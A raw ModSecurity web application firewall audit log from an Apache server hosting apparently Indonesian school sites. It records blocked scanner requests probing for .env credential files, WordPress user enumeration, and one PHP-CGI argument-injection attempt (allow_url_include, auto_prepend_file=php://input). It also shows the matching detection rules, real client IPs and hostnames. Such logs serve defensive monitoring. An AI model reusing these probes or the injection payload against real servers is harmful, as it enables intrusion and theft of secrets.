X-Real-IP: 186.235.64.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.235.64.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5f1b0531-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f1b0531-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749389868033087 3010 (- - -) Stopwatch2: 1749389868033087 3010; combined=1320, p1=436, p2=853, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f1b0531-Z-- --5f1b0531-A-- [08/Jun/2025:20:43:45 +0700] aEWTkcCyjFxjzV1Pwa04vwAAABU 103.236.140.4 35558 103.236.140.4 8181 --5f1b0531-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1 Accept-Charset: utf-8 --5f1b0531-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f1b0531-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749390225808514 798 (- - -) Stopwatch2: 1749390225808514 798; combined=325, p1=283, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f1b0531-Z-- --7471012b-A-- [08/Jun/2025:20:53:39 +0700] aEWV48CyjFxjzV1Pwa04wwAAABg 103.236.140.4 35628 103.236.140.4 8181 --7471012b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.153.21.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.153.21.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7471012b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7471012b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749390819857292 3179 (- - -) Stopwatch2: 1749390819857292 3179; combined=1349, p1=444, p2=876, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7471012b-Z-- --ee80b756-A-- [08/Jun/2025:21:01:57 +0700] aEWX1YsoVckF-yt1MVzaCAAAAMU 103.236.140.4 35722 103.236.140.4 8181 --ee80b756-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 630) like Gecko Accept-Charset: utf-8 --ee80b756-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee80b756-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749391317841930 747 (- - -) Stopwatch2: 1749391317841930 747; combined=305, p1=267, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee80b756-Z-- --e12fa05e-A-- [08/Jun/2025:21:02:10 +0700] aEWX4osoVckF-yt1MVzaCQAAAMs 103.236.140.4 35724 103.236.140.4 8181 --e12fa05e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Links (2.1pre15; Linux 2.4.26 i686; 158x61) Accept-Charset: utf-8 --e12fa05e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e12fa05e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749391330462102 825 (- - -) Stopwatch2: 1749391330462102 825; combined=351, p1=309, p2=0, p3=0, p4=0, p5=41, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e12fa05e-Z-- --2f52ac0c-A-- [08/Jun/2025:21:40:38 +0700] aEWg5qD1_iznf-QmBECXOAAAAI0 103.236.140.4 35900 103.236.140.4 8181 --2f52ac0c-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: HTMLParser/1.6 Accept-Charset: utf-8 --2f52ac0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f52ac0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749393638803818 846 (- - -) Stopwatch2: 1749393638803818 846; combined=333, p1=288, p2=0, p3=0, p4=0, p5=44, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f52ac0c-Z-- --0be2ff48-A-- [08/Jun/2025:21:57:55 +0700] aEWk88e0OZpePEzoRnpWgQAAAE8 103.236.140.4 35988 103.236.140.4 8181 --0be2ff48-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.142.108.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.142.108.14 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0be2ff48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0be2ff48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749394675325911 3167 (- - -) Stopwatch2: 1749394675325911 3167; combined=1396, p1=480, p2=883, p3=0, p4=0, p5=33, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0be2ff48-Z-- --60b77558-A-- [08/Jun/2025:22:03:30 +0700] aEWmQse0OZpePEzoRnpWgwAAAEA 103.236.140.4 36006 103.236.140.4 8181 --60b77558-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 125.17.108.32 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 125.17.108.32 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --60b77558-C-- --60b77558-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60b77558-E-- --60b77558-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749395010055887 5199 (- - -) Stopwatch2: 1749395010055887 5199; combined=3597, p1=507, p2=3058, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60b77558-Z-- --ee9d370c-A-- [08/Jun/2025:22:18:31 +0700] aEWpx8CyjFxjzV1Pwa04-AAAABQ 103.236.140.4 36210 103.236.140.4 8181 --ee9d370c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.176.46.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.176.46.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ee9d370c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee9d370c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749395911367921 3100 (- - -) Stopwatch2: 1749395911367921 3100; combined=1361, p1=486, p2=845, p3=0, p4=0, p5=29, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee9d370c-Z-- --f1d9007f-A-- [08/Jun/2025:22:19:10 +0700] aEWp7osoVckF-yt1MVzaMwAAAMY 103.236.140.4 36216 103.236.140.4 8181 --f1d9007f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3833.99 Safari/537.36 Accept-Charset: utf-8 --f1d9007f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1d9007f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749395950877164 863 (- - -) Stopwatch2: 1749395950877164 863; combined=393, p1=350, p2=0, p3=0, p4=0, p5=43, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1d9007f-Z-- --bf915914-A-- [08/Jun/2025:22:33:34 +0700] aEWtTsCyjFxjzV1Pwa05CQAAABg 103.236.140.4 36292 103.236.140.4 8181 --bf915914-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 178.128.207.138 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 178.128.207.138 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --bf915914-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf915914-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749396814511257 662 (- - -) Stopwatch2: 1749396814511257 662; combined=246, p1=219, p2=0, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf915914-Z-- --9228f95e-A-- [08/Jun/2025:23:10:15 +0700] aEW156D1_iznf-QmBECYfQAAAJc 103.236.140.4 39928 103.236.140.4 8181 --9228f95e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.198 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --9228f95e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9228f95e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749399015291980 2189 (- - -) Stopwatch2: 1749399015291980 2189; combined=1064, p1=344, p2=689, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9228f95e-Z-- --d921f41b-A-- [08/Jun/2025:23:16:49 +0700] aEW3caD1_iznf-QmBECZWgAAAIU 103.236.140.4 43068 103.236.140.4 8181 --d921f41b-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 31.56.56.150 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 31.56.56.150 Accept-Encoding: gzip X-Varnish: 173687059 --d921f41b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d921f41b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749399409728118 764 (- - -) Stopwatch2: 1749399409728118 764; combined=304, p1=270, p2=0, p3=0, p4=0, p5=34, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d921f41b-Z-- --1d91e060-A-- [08/Jun/2025:23:45:47 +0700] aEW-O4soVckF-yt1MVzbkwAAAMU 103.236.140.4 43376 103.236.140.4 8181 --1d91e060-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --1d91e060-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d91e060-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749401147564864 894 (- - -) Stopwatch2: 1749401147564864 894; combined=343, p1=309, p2=0, p3=0, p4=0, p5=33, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d91e060-Z-- --9223567d-A-- [08/Jun/2025:23:45:47 +0700] aEW-O8CyjFxjzV1Pwa07VgAAAAY 103.236.140.4 43380 103.236.140.4 8181 --9223567d-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --9223567d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9223567d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749401147645507 666 (- - -) Stopwatch2: 1749401147645507 666; combined=256, p1=228, p2=0, p3=0, p4=0, p5=27, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9223567d-Z-- --d5e02b43-A-- [08/Jun/2025:23:45:47 +0700] aEW-O8CyjFxjzV1Pwa07WAAAAAk 103.236.140.4 43384 103.236.140.4 8181 --d5e02b43-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --d5e02b43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5e02b43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749401147967012 732 (- - -) Stopwatch2: 1749401147967012 732; combined=293, p1=264, p2=0, p3=0, p4=0, p5=29, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5e02b43-Z-- --198f4a1e-A-- [08/Jun/2025:23:51:02 +0700] aEW_dqD1_iznf-QmBECZcQAAAIs 103.236.140.4 43434 103.236.140.4 8181 --198f4a1e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.31 (KHTML like Gecko) Chrome/26.0.1410.63 Safari/537.31 Accept-Charset: utf-8 --198f4a1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --198f4a1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749401462640396 817 (- - -) Stopwatch2: 1749401462640396 817; combined=339, p1=294, p2=0, p3=0, p4=0, p5=45, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --198f4a1e-Z-- --98c7fc60-A-- [09/Jun/2025:00:08:25 +0700] aEXDicCyjFxjzV1Pwa07jwAAABA 103.236.140.4 44454 103.236.140.4 8181 --98c7fc60-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.192.2.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.192.2.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --98c7fc60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --98c7fc60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749402505153791 2989 (- - -) Stopwatch2: 1749402505153791 2989; combined=1331, p1=459, p2=833, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98c7fc60-Z-- --0a2b7b54-A-- [09/Jun/2025:00:17:33 +0700] aEXFrYsoVckF-yt1MVzcdQAAAMI 103.236.140.4 44504 103.236.140.4 8181 --0a2b7b54-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.58.159.31 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.58.159.31 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --0a2b7b54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a2b7b54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file 